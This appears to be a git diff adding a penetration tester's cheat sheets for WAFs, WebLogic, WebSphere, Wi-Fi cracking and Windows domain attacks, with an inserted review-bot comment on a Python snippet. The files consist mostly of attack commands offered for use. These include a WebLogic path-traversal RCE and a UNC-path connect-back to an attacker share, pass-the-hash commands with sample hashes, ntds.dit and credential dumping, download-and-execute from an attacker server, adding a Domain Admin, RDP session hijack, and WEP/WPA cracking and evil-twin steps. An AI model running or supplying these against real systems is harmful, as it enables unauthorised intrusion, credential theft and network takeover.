new file mode 100644
index 0000000..a797064
--- /dev/null
+++ b/Cheat Sheet/waf
@@ -0,0 +1,9 @@
+# waf
+
+# detect waf
+http-waf-detect.nse
+
+# bypass waf
+http://translate.wooyun.io/2015/09/01/Bypass-WAF-Cookbook.html
+http://www.exploit-db.com/papers/17934/
+https://github.com/ironbee/waf-research
diff --git a/Cheat Sheet/webkit b/Cheat Sheet/webkit
new file mode 100644
index 0000000..59c47aa
--- /dev/null
+++ b/Cheat Sheet/webkit
@@ -0,0 +1,17 @@
+# webkit
+
+# CoreText Mac OSX DoS
+https://news.ycombinator.com/item?id=6293824
+
+This isn't a bug inside WebKit. It's a bug inside Apples CoreText font rendering framework.
+`curl https://zhovner.com/tmp/killwebkit.html` in iTerm2 crashes
+
+Yes, I cannot reproduce the crash on OS X 10.8.4 and iTerm2 1.0.0.20130624. Maybe Apple has fixed it in the latest OS patch.
+UPDATE: It does kill Chrome 31 (individual tab) and Safari 6.0.5 (the whole browser!).
+
+https://twitter.com/daken_/status/303784082599456768 "Safari crashes on 10.8.4 for me."
+
+python -c "u'\u0647\u0020\u0488\u0488\u0488'
+
+root@kali:~# airmon-ng start wlan0
+root@kali:~# airbase-ng -e " ̷̴̐خ ̷̴̐خ ̷̴̐خ امارتيخ ̷̴̐خ" -q -c 11 mon0
diff --git a/Cheat Sheet/weblogic b/Cheat Sheet/weblogic
new file mode 100644
index 0000000..aae4b90
--- /dev/null
+++ b/Cheat Sheet/weblogic
@@ -0,0 +1,64 @@
+# oracle weblogic
+
+# admin console
+http://host:port/console (port 7001/tcp by default)
+default admin username: weblogic
+password needs to have digit I think, so try weblogic1, welcome1, etc.
+also read about system/password (before peoplesoft tools 8.5) and system/Passw0rd
+http://gasparotto.blogspot.com.au
+
+## Oracle WebLogic Server Node Manager
+# File Traversal RCE (CVE-2010-0073)
+* preauth with Oracle WebLogic Server <= 10.3.2, postauth otherwise
+http://intevydis.blogspot.com/2010/01/oracle-weblogic-1032-node-manager-fun.html (post deleted :()
+$ openssl s_client -host 1.2.3.4 -port 5556 -ssl2
+hello blah
++OK Node manager v10.3 started
+DOMAIN xyz
+-ERR I/O error while reading domain directory
+GETNMLOG
+java.io.FileNotFoundException: Domain directory ‘C:\OracleMiddleware\wl_server\10.3\common\nodemanager’ invalid
+DOMAIN wl_server
++OK Current domain set to ‘wl_server’
+EXECSCRIPT ../../../../../../../../Windows/System32/ping.exe
+-ERR 1
+GETNMLOG
+
+
+* postauth
+domain #can be found in /dms or /console or in URLs or uddi (maybe?)
+user weblogic
+pass Welcome1
+execscript ../../../../../../../../../../../../../../../bin/dispuid
+getnmlog
+
+# more info about Node Manager (default port 5556)
+http://pietermalan.blogspot.fr/2012/04/interacting-with-nodemanager.html
+Node Manager utility is used to start stop server instances remotely
+default domains wl_server and medrec
+
+# UNC Path RCE
+domain \\attackerip\share
+execscript connectback.sh
+
+# command line client to remotely deploy webapp (i think it calls /bea_wls_cluster_internal/DeploymentService)
+http://docs.oracle.com/cd/E13222_01/wls/docs90/deployment/wldeployer.html
+http://docs.oracle.com/cd/E15051_01/wls/docs103/deployment/deploy.html
+
+# default deployed apps on weblogic
+/dms
+/_async
+/bea_wls_cluster_internal
+/bea_wls_deployment_internal
+/bea_wls_internal
+/uddi
+/uddiexplorer
+/inspection.wsil
+
+# UDDI
+SSRF: $ curl -s http://vuln/uddiexplorer/SearchPublicRegistries.jsp -d 'operator=http%3A%2F%2F127.0.0.1:22%2Fwoot&rdoSearch=name&txtSearchname=asdf&btnSubmit=Search'
+server expects SOAP response (see uddi wdsl on internet)
+
+# misc
+LSV hsc sur rce via le protocole T3
+https://blog.netspi.com/decrypting-weblogic-passwords/
diff --git a/Cheat Sheet/webrtc b/Cheat Sheet/webrtc
new file mode 100644
index 0000000..4ce5cf8
--- /dev/null
+++ b/Cheat Sheet/webrtc
@@ -0,0 +1,3 @@
+# webrtc STUN
+
+https://diafygi.github.io/webrtc-ips/
diff --git a/Cheat Sheet/webservice b/Cheat Sheet/webservice
new file mode 100644
index 0000000..d47c0c9
--- /dev/null
+++ b/Cheat Sheet/webservice
@@ -0,0 +1,5 @@
+# webservice ws
+
+https://www.isecpartners.com/tools/application-security/wsmap.aspx
+https://www.isecpartners.com/tools/application-security/wsbang.aspx
+http://ws-attacks.org/index.php/Main_Page
diff --git a/Cheat Sheet/webshells b/Cheat Sheet/webshells
new file mode 100644
index 0000000..4b0af1e
--- /dev/null
+++ b/Cheat Sheet/webshells
@@ -0,0 +1,16 @@
+# webshells
+
+https://github.com/hatRiot/clusterd.git
+http://www.securityaegis.com/web-shells-for-all/
+https://github.com/epinna/Weevely
+
+# tunnel TCP over HTTP
+reDuh
+https://github.com/sensepost/reGeorg
+http://www.secforce.com/research/tunna.html
+
+# php in jpg
+https://github.com/d0lph1n98/Defeating-PHP-GD-imagecreatefromjpeg
+
+# javascript
+https://github.com/Den1al/JSShell/
diff --git a/Cheat Sheet/websphere b/Cheat Sheet/websphere
new file mode 100644
index 0000000..4d3d58e
--- /dev/null
+++ b/Cheat Sheet/websphere
@@ -0,0 +1,42 @@
+# websphere
+
+# admin console (to confirm)
+https://:9043/ibm/console/
+
+# {xor}Lz4sLCgwLTs=
+python -c "print(''.join([chr(ord(c) ^ ord('_')) for c in 'Lz4sLCgwLTs='.decode('base64')]))"
+
+# xmlaccess
+http://192.168.122.238:10039
+
+* Export.xml
+Should exports users from LDAP
+
+
+
+
+
+* deploy a new malicious portlet
+see vm_deploy.xml (based on template DeployPortlet.xml)
+/wps/PA_WPS_WSTest/
+
+pb if cluster setup, server will NOT start new portlet (error msg like "wait for synchronisation of all nodes to be done")
+ConfigEngine.sh activate-portlets (or xml-samples/ActivatePortlet.xml)
+
+maybe a solution is to update an existing portlet like Welcome (need to test)
+
+# blog d'un fanboy
+http://codyburleson.com/2013/01/24/xmlaccess-samples-in-ibm-websphere-portal/
+
+# links
+http://www-947.ibm.com/support/entry/portal/documentation/software/websphere/websphere_portal
+http://www.ibm.com/developerworks/websphere/zones/portal/proddoc/
+http://www-10.lotus.com/ldd/portalwiki.nsf/xpViewCategories.xsp?lookupName=Product%20Documentation
+http://www-10.lotus.com/ldd/portalwiki.nsf/xpDocViewer.xsp?lookupName=IBM+WebSphere+Portal+8+Product+Documentation#action=openDocument&content=catcontent&ct=prodDoc
+
+# disable unused apps
+http://www-01.ibm.com/support/docview.wss?uid=swg21472871
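Review bot: The `{xor}` decoder on the `python -c` line relies on Python 2's `str.decode('base64')` and raises `AttributeError` under Python 3; a portable form is `python3 -c "import base64; print(''.join(chr(b ^ ord('_')) for b in base64.b64decode('Lz4sLCgwLTs=')))"`. It is worth stating above it that `{xor}` is reversible obfuscation rather than encryption, so any properties file carrying such a value has to be protected like a plaintext credential. The admin console URL `https://:9043/ibm/console/` is also missing its host placeholder.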
diff --git a/Cheat Sheet/wget b/Cheat Sheet/wget
new file mode 100644
index 0000000..213c88a
--- /dev/null
+++ b/Cheat Sheet/wget
@@ -0,0 +1,7 @@
+# wget
+
+# ne pas essayer de telecharger robots.txt
+-e robots=off
+
+# definir le nombre de retry
+-t 5
diff --git a/Cheat Sheet/whois b/Cheat Sheet/whois
new file mode 100644
index 0000000..80e1abf
--- /dev/null
+++ b/Cheat Sheet/whois
@@ -0,0 +1,16 @@
+# whois
+
+$ whois -h whois.ripe.net example.com
+[...]
+nserver NETDNS01.SYSTALIANS.EU 217.109.14.181
+
+$ whois 217.109.14.181
+[...]
+tech-c Ljc10-RIPE
+
+$ whois -h whois.ripe.net Ljc10-RIPE
+person: John Smith
+
+# recherche inverse sur le contact technique
+$ whois -h whois.ripe.net -i tech-c Ljc10-RIPE
+
diff --git a/Cheat Sheet/wifi b/Cheat Sheet/wifi
new file mode 100644
index 0000000..9f1d81d
--- /dev/null
+++ b/Cheat Sheet/wifi
@@ -0,0 +1,100 @@
+# wifi
+
+https://github.com/routerkeygen
+
+# harvest valuable info in wpa enterprise traffic
+Creap http://www.shellntel.com/blog/2015/9/23/assessing-enterprise-wireless-networks https://github.com/Shellntel/scripts.git
+EAPeak https://github.com/securestate/eapeak
+
+# WPS
+tshark -i wlan1mon -Y 'wps.wifi_protected_setup_state == 2' # check if wps is enabled
+https://github.com/SilentGhostX/HT-WPS-Breaker (automates Piexiewps Reaver Bully Aircrack-ng)
+https://github.com/wiire/pixiewps
+http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/ (default wps pins)
+
+# rogue ap
+sensepost/mana hostapd-mana
+
+# wpa2 crack pass without AP
+http://n0where.net/wpa2-halfhandshake-crack/
+
+# wepbuster
+outil pour casser du wep automatiquement
+
+# bbox (bouygues)
+http://www.korben.info/les-bbox-de-bouygues-telecom-sont-toutes-piratables-facilement-en-plus.html
+
+# fern-wifi-cracker (blackarch)
+gui based wireless security auditing application that uses the aircrack-ng suite of tools
+
+# create an evil wireless access point
+http://www.offensive-security.com/kali-linux/kali-linux-evil-wireless-access-point/
+
+# aircrack
+* WPA
+airodump-ng -c 11 -w neuf --bssid 00:17:11:22:AB:CD mon
+aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 -D mon0
+aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap
+
+* WEP
+airmon-ng start wlan0 11
+ifconfig mon0 down
+macchanger -m mon0
+ESSID=
+BSSID=
+SRC= <- use my MAC or any random one, if fake auth fails maybe MAC whitelisting is in place
+ifconfig mon0 up
+airodump-ng -i -w blah -c 11 --bssid $BSSID mon0
+aireplay-ng -1 0 -e $ESSID -a $BSSID -h $SRC -D mon0
+// or
+aireplay-ng -1 6000 -o 1 -q 10 -e $ESSID -a $BSSID -h $SRC -D mon0
+aireplay-ng -3 -a $BSSID -h $SRC -D mon0
+
+// skip fake auth if spoofing already associated client or see aireplay-ng -2 to replay ARP issued by associated client
+
+aircrack -w path/to/wordlist.dic blah*.ivs
+
+# fake auth OK looks like:
+12:33:17 Sending Authentication Request (Open System)
+
+12:33:19 Sending Authentication Request (Open System) [ACK]
+12:33:19 Authentication successful
+12:33:19 Sending Association Request [ACK]
+12:33:19 Association successful :-) (AID: 1)
+
+12:33:29 Sending keep-alive packet [ACK]
+12:33:39 Sending keep-alive packet [ACK]
+12:33:39 Got a deauthentication packet! (Waiting 3 seconds)
+
+12:33:42 Sending Authentication Request (Open System) [ACK]
+12:33:43 Authentication successful
+12:33:43 Sending Association Request [ACK]
+12:33:44 Association successful :-) (AID: 1)
+
+12:33:54 Sending keep-alive packet [ACK]
+12:34:04 Sending keep-alive packet [ACK]
+...
+
+# crack WEP key
+aircrack-ng -b 00:14:6C:7E:40:80 output*.cap
+or
+aircrack-ng -K -b 00:14:6C:7E:40:80 output*.cap # invokes the FMS/Korek method
+
+# other techniques to crack WEP
+http://ha.cker.ir/2013/06/how-to-hack-wifi-protected-with-wep/
+
+# evil twin
+airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 11 mon0
+
+iwconfig wlan0 txpower 27
+iwconfig wlan0 txpower 30
+
+# find connected ap on windows
+netsh wlan show all | more
+
+# 5gz
+airmon-ng start wlan1 36
+iwlist wlan1mon frequency
+
+airodump -b a ...
+
diff --git a/Cheat Sheet/windbg b/Cheat Sheet/windbg
new file mode 100644
index 0000000..b984702
--- /dev/null
+++ b/Cheat Sheet/windbg
@@ -0,0 +1,11 @@
+# windbg
+
+gflags /i iexplore.exe +hpa +ust
+gflags /p /enable iexplore.exe
+
+# must disable gflags before doing heap spray
+gflags /i iexplore.exe -hpa -ust
+gflags /p /disable iexplore.exe
+!peb
+!heap -stat -h
+s -a 0 L?7fffffff "woot"
diff --git a/Cheat Sheet/windows b/Cheat Sheet/windows
new file mode 100644
index 0000000..d1eb714
--- /dev/null
+++ b/Cheat Sheet/windows
@@ -0,0 +1,438 @@
+# windows
+
+# end of life / support
+http://support.microsoft.com/lifecycle/search/default.aspx?
+
+# logging
+http://sniperforensicstoolkit.squarespace.com/storage/logging/Windows%20Logging%20Cheat%20Sheet%20v1.1.pdf
+
+# version
+# http://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions
+# http://en.wikipedia.org/wiki/Ver_(command)
+4.0 NT4
+5.0 2000
+5.1 XP
+5.2 2003 & 2003 R2 or XP x64
+6.0 Vista or 2008
+6.1 Windows 7 or 2008 R2
+6.2 Windows 8 or Windows Server 2012
+6.3 Windows 8.1 or Windows Server 2012 R2
+
+# hashes
+LM: DES
+NT: MD4
+
+# comptes
+501 (0x1f5) -> compte guest
+
+# active directory
+controleur de domaine se reperent avec les ports ouverts suivants: 88, 389, 636, 53, 42
+
+* pour avoir la liste des DC
+nmblookup 'EXAMPLE#1c'
+nbquery (http://www.skullsecurity.org/wiki/index.php/Nbquery)
+dig @nameserver _ldap._tcp.dc._msdcs.example.com. SRV
+nltest /dclist:EXAMPLE
+nslookup -type=srv _ldap...
+
+* pour avoir le PDC
+nmblookup 'EXAMPLE#1b' #http://ubiqx.org/cifs/Appendix-C.html
+dig @nameserver _ldap._tcp.pdc._msdcs.example.com. SRV
+nltest /dcname:EXAMPLE
+
+* DNS "zone transfer" (http://carnal0wnage.attackresearch.com/2013/10/ad-zone-transfers-as-user.html)
+dns-dump.ps1 -zone projectmentor.net -dc dc1
+powershell -ep bypass -f dnsdump.ps1 -zone projectmentor.net -dc dc1 [-csv]
+
+* recon without admin rights
+https://adsecurity.org/?p=2535
+
+* rm -fr
+rmdir /s /q c:\windows\temp\tw
+
+* tasklist
+taskkill /F /IM "cmd.exe" # killall
+
+* misc
+set logon server
+dsquery * domainroot -filter "&(objectCategory=computer)" -attr name -l -limit 0 # list all hosts in the domain
+
+* samdump http://sh4ka.fr/?p=1850
+bin/samba-tool join sh4kaindustry.local DC -U 'amoulu%test1234!'
+bin/samba-tool samdump
+
+* http://www.linuxposts.com/samba/36957-samba-samba-4-ad-native-mode.html
+net join bdc
+net samdump
+
+* schtasks
+schtasks /create /ru system /tn "blah" /tr "C:\temp\tw\scan.bat" /sc once /st 14:00:00 #or try to create it w/out any scheduling
+schtasks /run /tn "blah"
+schtasks /end /tn "blah"
+schtasks /delete /tn "blah"
+
+# port scanning with netsh
+netsh diag connect iphost 10.0.0.2 443 -> "Server appears to be running on port(s) [NONE] " vs. "Server appears to be running on port(s) [443]"
+
+# netbios / SMB scan
+* list what services are available
+nbtscan
+smbclient -U '%' -L 1.2.3.4
+
+* scan for shares
+nmbscan
+
+* cifs
+mount -t cifs -o user=user,password=secret,domain=DOM '//10.0.0.1/c$' /mnt/pwn
+use -o soft to "soft mount" smb shares then you won't get lockups, etc. if the share disappears, also see -o nolock
+not recommended for persistent shares, as you then want the kernel to do everything it can to restore the mount.
+
+* get mac from IP
+nbtstat -a 10.0.0.2
+
+# net(1) usage
+NB. [ads|rpc|rap] are optional, if omitted, net will try to determine it automatically
+
+net [rpc] info -l -U 'DOM\blah%p4ss' -S 192.168.56.101
+net [rpc] account # pw policy but doesnt work anymore, use enum4linux/polenum instead (https://labs.portcullis.co.uk/tools/)
+
+net [rpc] user
+net [rpc] user info # list domain groups of user (without the "DOM\")
+net [rpc] share
+
+net [rpc] group list
+net [rpc] group members administrators
+net [rpc] group members 'Domain users'
+
+net [rpc] registry enumerate 'HKLM\Software'
+
+net [rpc] file
+
+net [rap] session # list of users connected to the server, but always shows empty on my vm (broken?)
+net [rap] server domain # list servers in this domain
+net [rap] domain # list domains
+net [rap] service
+
+net lookup host WKS123
+net lookup dc MAIN
+net lookup master MAIN
+
+net [rpc] trustdom list
+
+net [rap] printq
+
+NB. si certaines commandes ne retournent rien c peut etre parce qu'il faut un samba qui tourne en local
+
+* ajout dans Domain Admins sur un DC
+net user hsc * /add
+net group "Domain admins" hsc /add
+
+# hives
+python regfetch.py security.save 'Policy\Secrets\NL$KM\CurrVal' '(default)' | xxd
+python regfetch.py security.save 'Cache' 'NL$1' | xxd
+
+# hives backups
+c:\windows\repair or c:\windows\system32\config\regback (w2k8)
+
+# run cmd.exe as SYSTEM
+msf current_user_psexec (psh technique) // https://community.rapid7.com/community/metasploit/blog/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit
+or
+psexec -accepteula -i -s
+or
+sc create testsvc binpath= "cmd /K start" type= own type= interact
+sc start testsvc
+sc delete testsvc
+at / schtasks (wont work on recent windows)
+or
+metastploit meterpreter getsystem
+
+local admin to SYSTEM (w/ or w/out UAC) http://carnal0wnage.attackresearch.com/2013/07/admin-to-system-win7-with-remoteexe.html
+
+# dump creds
+dump local creds -> offline with impacket/secretsdump.py or creddump/pwdump.py, online with fgdump (only domain accounts: fgdump.exe -c -v -a)
+dump domain creds -> offline with impacket/secretsdump.py or libesedb+ntdsxtract or msf-geek
+dump cached creds -> offline with impacket/secretsdump.py or creddump/cachedump.py, online with meterpreter/cachedump.rb or cachedump or fgdump
+dump lsa secrets -> offline with impacket/secretsdump.py or creddump/lsadump.py, online with gsecdump
+dump in-memory creds -> offline with mimikatz (outbound SMB sessions), online with wce
+dump passwords remembered in Credential Manager -> netpass
+dump passwords remembered in Protected Storage (IE, Outlook) -> pspv
+dump passwords remembered by third-party software -> NirSoft tools, carrot, msf post modules
+src: http://bernardodamele.blogspot.com.au/
+
+# authenticated code execution
+http://www.scriptjunkie.us/2013/02/authenticated-remote-code-execution-methods-in-windows/
+https://community.rapid7.com/community/metasploit/blog/2012/11/08/abusing-windows-remote-management-winrm-with-metasploit // use winrm to get a shell
+https://code.google.com/p/impacket/source/browse/trunk/examples/wmiexec.py
+
+# sysinternals/psexec alternatives (noisy: upload binary, creates service, etc.)
+* didnt seem to work on w2k12r2 during a pt
+pth/winexe impacket/psexec.py sysinternals/psexec
+
+* sysinternals/psexec.exe
+psexec -h to bypass UAC
+
+* impacket/psexec.py (whoami => system)
+http://pen-testing.sans.org/blog/pen-testing/2013/03/27/psexec-python-rocks (import psexec)
+
+* WMI // needs DCOM access and beware about semi-interactive shells (eg. cant run cmds that would last long)
+impacket/wmiexec.py (whoami => user)
+pth/wmis
+http://www.room362.com/blog/2014/04/19/executing-code-via-smb-without-psexec/ (import wmiexec)
+http://passing-the-hash.blogspot.co.nz/2013/07/WMIS-PowerSploit-Shells.html
+
+* winexe-PTH (whoami => twadmin)
+winexe-PTH --uninstall -U DOM/twadmin%Password1 //10.0.0.1 cmd.exe
+
+* metasploit psexec.rb
+http://carnal0wnage.attackresearch.com/2013/07/metasploit-standalone-psexec.html (uploaded .exe has to be a service executable)
+
+* Veil-Catapult
+http://diablohorn.wordpress.com/2013/10/19/alternative-psexec-no-wmi-services-or-mof-needed/
+
+# NT_STATUS_INVALID_WORKSTATION
+winexe --netbiosname=
+
+# pass-the-hash
+didnt seem to work on w2k12r2 during pt: xfreerdp /pth
+
+http://www.harmj0y.net/blog/penetesting/pass-the-hash-is-dead-long-live-pass-the-hash/
+
+https://code.google.com/p/passing-the-hash/
+winexe --uninstall -U renadm%aad3b435b51404eeaad3b435b51404ee:780ede86e3d0878243a4fabd56d72644 //10.0.0.1 cmd.exe
+wmic -U demo/administrator%hash //172.16.1.1 "select csname,name,processid,sessionid from win32_process"
+wmis -U demo/administrator%hash //172.16.1.1 'cmd.exe /c dir c:\ > c:\windows\temp\blog.txt' # http://passing-the-hash.blogspot.com.au/
+smbclient -U demo\\user%aad3b435b51404eeaad3b435b51404ee:780ede86e3d0878243a4fabd56d72644
+smbget -w demo -u demo\\administrator -O -p smb://172.16.1.1/c$/windows/temp/blog.txt
+xfreerdp /pth:
+nmap --script-args smbuser=foo,smbhash=
+
+net time \\target
+at \\target HH:MM c:\path\to\bad.exe
+wmic /node:TARGET process call create "c:\path\to\bad.exe"
+sc \\target create blah binpath=c:\path\to\bad.exe
+sc \\target start blah
+
+# backtrack/forensic
+* post/windows/gather/enum_termserv
+list users who used mstsc and where they connected to
+
+* parse user artefacts
+with what tools?
+
+# enum users
+* nmap/smb-enum-users.nse
+./nmap -p U:137,T:139 --script smb-enum-users --script smb-enum-groups --script-args=smbusername=blah,smbpassword/smbhash=...,smbdomain=FOO,samronly=1 -vv 192.168.122.196
+
+* metasploit/auxiliary/scanner/smb/smb_enumusers
+list local users
+[*] 192.168.122.74 WIN-LEK1BKKKKD8 [ Administrator, Guest, foo ] ( LockoutTries=0 PasswordMin=0 )
+
+# enum logged-on users && hunt VIP
+* Derivative Local Admins
+https://www.sixdub.net/?p=591
+
+* eventlogs (need DA privs)
+psloglist.exe \\dc1.corp.com -u twadmin -p Password1 -s -i 4624,4768,4769 -accepteula security > %TEMP%\extract.csv
+Get-UserLogonEvents / Invoke-UserLogonHunter (http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/)
+
+* other stealthier ways
+https://www.netspi.com/blog/entryid/214/faster-domain-escalation-using-ldap
+https://www.netspi.com/blog/entryid/132/5-ways-to-find-systems-running-domain-admin-processes
+
+* http://www.slideshare.net/harmj0y/i-hunt-sys-admins
+impacket smbclient.py adm-lulz:Password123@192.168.122.23 -file <(echo who) # only lists inbound smb conns (same as net rap session but doesnt require admin creds)
+psloggedon (doesnt show source IP?)
+netsess.exe (can query remote computer, no admin privs required) http://www.joeware.net/freetools/tools/netsess/index.htm
+PVEFindADUsers (need admin access) https://www.corelan.be/index.php/2009/07/12/free-tool-find-where-ad-users-are-logged-on-into/
+netview.exe (spray, no admin privs) https://github.com/mubix/netview
+smb-enum-sessions.nse (only need valid domain or local account) ./nmap --script smb-enum-sessions.nse --script-args=smbusername=administrator,smbpassword=Password1 -vv -p 445 10.0.0.0/24
+nbtenum.exe (http://nbtenum.sourceforge.net/) // never tested
+veil-powerview Invoke-UserHunter Invoket-StealthUserHunter (also checks if you're local admin) https://www.veil-framework.com/hunting-users-veil-framework/ http://www.harmj0y.net/blog/penetesting/finding-local-admin-with-the-veil-framework/
+powersploit/Invoke-TokenManipulation https://www.trustedsec.com/january-2015/account-hunting-invoke-tokenmanipulation/
+
+* metasploit
+post/windows/gather/local_admin_search_enum.rb (query all domain machines to find where im local admin) // never tested
+post/windows/gather/enum_domain_users.rb (query all domain machines to find where target users are logged in | http://www.sensepost.com/blog/8764.html msf module better than PsLoggedOn?) // never tested
+auxiliary/scanner/smb/psexec_loggedin_users (doesnt list SMB sessions)
+auxiliary/scanner/smb/smb_enumusers_domain (determine what domain users are logged into a remote system) // never tested
+
+# harvest user/group in AD from parsing ntds.dit
+https://bitbucket.org/iwseclabs/bta
+
+# {meterpreter,psexec,psloggedon}-fu
+http://pen-testing.sans.org/blog/pen-testing/2013/08/08/psexec-uac-bypass
+
+# UAC bypass
+https://dfirblog.wordpress.com/2015/10/24/protecting-windows-networks-uac/
+https://github.com/hfiref0x/UACME
+
+# dump domain hashes using offline copy of ntds.dit and SYSTEM
+* sc query vss
+
+* get path to ntds.dit (default location is c:\windows\ntds\ntds.dit)
+reg.exe query HKLM\System\CurrentControlSet\Services\NTDS\Parameters -> "DSA Database file"
+
+* copy ntds.dit using Volume Shadow Copy
+manually with ntdsutil or vssadmin (pre 2008)
+
+automatically with msf
+ - psexec_command: http://www.pentestgeek.com/2013/01/10/psexec_command-not-your-daddys-psexec
+ - pentestergeek: http://www.accuvant.com/blog/owning-computers-without-shell-access (msf-geek)
+
+reg.exe save hklm\system c:\temp\system.save
+
+* restore vss service to original state
+
+* extract hashes
+impacket/secretsdump.py
+or {
+libesedb: ./esedbexport -l /tmp/export.log -t /tmp/export ntds.dit {
+NTDSXtract: python dsusers.py /tmp/export/datatable.3 /tmp/export/link_table.5 --passwordhashes system.save
+or
+msf-geek: ntds_hashextract.rb /tmp/export/datatable.3 /ww/system.save }}
+
+# ntdsutil (http://technet.microsoft.com/en-us/library/cc753609(WS.10).aspx)
+ntdsutil.exe, snapshot, activate instance NTDS, list all, create, list all, mount 2, unmount 2, delete 1, quit
+or
+ntdsutil.exe, ac in ntds, ifm, cr fu c:\test, q, q # https://bitbucket.org/iwseclabs/bta
+
+# vssadmin
+sc query vss
+vssadmin create shadow /for=C: // write down the uuid
+copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy..\Windows\NTDS\ntds.dit \\mylatop\share\ntds.dit
+vssadmin delete Shadows /Shadow={}
+sc stop vss
+sc query vss
+
+# ntds explorer
+https://github.com/yosqueoy/ditsnap
+
+# dump in-memory passwords
+* mimikatz+powershell to dump lots of hosts
+http://carnal0wnage.attackresearch.com/2013/10/dumping-domains-worth-of-passwords-with.html
+
+# wget in vbs (kyp)
+echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")>>wget.vbs
+echo objXMLHTTP.open "GET", WScript.Arguments(0),false>>wget.vbs
+echo objXMLHTTP.send()>>wget.vbs
+echo if objXMLHTTP.Status = 200 Then>>wget.vbs
+echo Set objADOStream = CreateObject("ADODB.Stream")>>wget.vbs
+echo objADOStream.Open>>wget.vbs
+echo objADOStream.Type = 1 'adTypeBinary>>wget.vbs
+echo objADOStream.Write objXMLHTTP.ResponseBody>>wget.vbs
+echo objADOStream.Position = 0>>wget.vbs
+echo Set objFSO = Createobject("Scripting.FileSystemObject")>>wget.vbs
+echo Set objFSO = Nothing>>wget.vbs
+echo objADOStream.SaveToFile LCase(WScript.Arguments(1))>>wget.vbs
+echo objADOStream.Close>>wget.vbs
+echo Set objADOStream = Nothing>>wget.vbs
+echo End if>>wget.vbs
+echo Set objXMLHTTP = Nothing>>wget.vbs
+
+# download and execute
+* with the BITSAdmin tool (win7+)
+bitsadmin /transfer job_name /download http://domain.com/file_name.exe c:\file_path\file_name.exe
+voir le sploit msf
+* with mshta (cf. exploit modules in msf)
+* ipmo
+PS C:\> ipmo BitsTransfer;Start-BitsTransfer -Source http://foo/nc.exe -Destination C:\Windows\Temp\
+* Enable the tftp client in Vista & higher, and pull files to a compromised server:
+C:\> ocsetup TFTP /quiet
+C:\> tftp -i attacksrv get bin.exe
+
+# bypass gpo proxy settings with regedit
+http://blog.scriptmonkey.eu/bypassing-group-policy-using-the-windows-registry/
+
+# know windows processes
+http://sysforensics.org/2014/01/know-your-windows-processes.html
+
+# bypass GPO path restrictions for Runas
+https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/master/RunAs.ps1
+
+# ssp filter
+http://kobyk.wordpress.com/2008/08/30/implementing-an-lsa-proxy-authentication-package/
+http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html (requires reboot)
+http://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/ (inject dll into lsass)
+https://code.google.com/p/mimikatz/source/browse/trunk/kiwissp/kiwissp.c (another example of ssp)
+
+# client side exploitation + priv escalation
+https://forsec.nl/2014/11/cve-2014-6332-internet-explorer-msf-module/
+
+# domain trusts
+http://www.harmj0y.net/blog/redteaming/domain-trusts-why-you-should-care/
+http://www.harmj0y.net/blog/redteaming/domain-trusts-were-not-done-yet/
+http://www.harmj0y.net/blog/redteaming/the-trustpocalypse/
+
+# use netsh to capture network traffic
+http://high54security.blogspot.co.nz/2015/03/netsh-trace-when-installing-winpcap-or.html
+https://isc.sans.edu/diary/No+Wireshark%3F+No+TCPDump%3F+No+Problem%21/19409
+
+# persistence
+http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/ # run task even if i'm not logged-in
+https://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/ (msf/s4u_persistence.rb)
+https://enigma0x3.wordpress.com/2015/03/05/using-alternate-data-streams-to-persist-on-a-compromised-machine/
+http://jumpespjump.blogspot.co.nz/2015/03/thousand-ways-to-backdoor-windows.html
+http://blakhal0.blogspot.com.au/2015/03/windows-event-log-driven-back-doors.html
+https://gist.github.com/subTee/e07e4a8aa6dc0e1cdf5d (Execute Shellcode From Registry with InstallUtil.exe)
+https://adsecurity.org/?p=1906
+
+# the DC machine account is DA
+http://room362.blogspot.co.nz/2015/09/using-domain-controller-account.html
+
+# DnsAdmins -> DA
+https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
+
+# active directory delegation (dscals.exe "ou=offices,dc=nss,dc=local")
+https://www.notsosecure.com/active-directory-delegation-manual-analysis/
+
+# finding where GPP account is a local admin
+http://www.harmj0y.net/blog/redteaming/where-my-admins-at-gpo-edition/
+
+# most common AD security issues
+https://adsecurity.org/?p=1684
+
+# lnk vuln
+ms10-046 Stuxnet, incomplete fix cve-2015-0096, patched again with ms15-020: http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Full-details-on-CVE-2015-0096-and-the-failed-MS10-046-Stuxnet/ba-p/6718459
+
+# retrieve kerberos arc4-hmac encrypted Tickets Granting Service (TGS) of accounts having a Service Principal Name (SPN) within an Active Directory
+https://github.com/Synacktiv/kerberom
+
+# hijack any RDP session with SYSTEM
+query user; sc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#46"
+http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html
+
+# RCEs
+# https://technet.microsoft.com/en-us/library/security/dn631937.aspx
+* ms03-039 (CVE-2003-0605)
+w2k SP1-4, XP SP0-1, w2k3?
+https://www.exploit-db.com/exploits/76/
+
+* ms06_040
+vuln: windows NT4 forever, Windows 2000 before SP5 or missing KB921883 which was included in SP5 (you can manually check the installed KBs at hklm\software\microsoft\updates\windows 2000)
+
+* ms08_067
+vuln: windows 2000 before SP5 or missing KB958644
+http://technet.microsoft.com/en-us/security/bulletin/ms08-067
+http://support.microsoft.com/kb/958644
+
+* ms14-066
+http://blog.beyondtrust.com/triggering-ms14-066 https://github.com/anexia-it/winshock-test
+
+* ms14-068
+http://adsecurity.org/?p=676
+https://technet.microsoft.com/library/security/MS14-068
+KB3011780
+
+* ms14-70 (CVE-2014-4076)
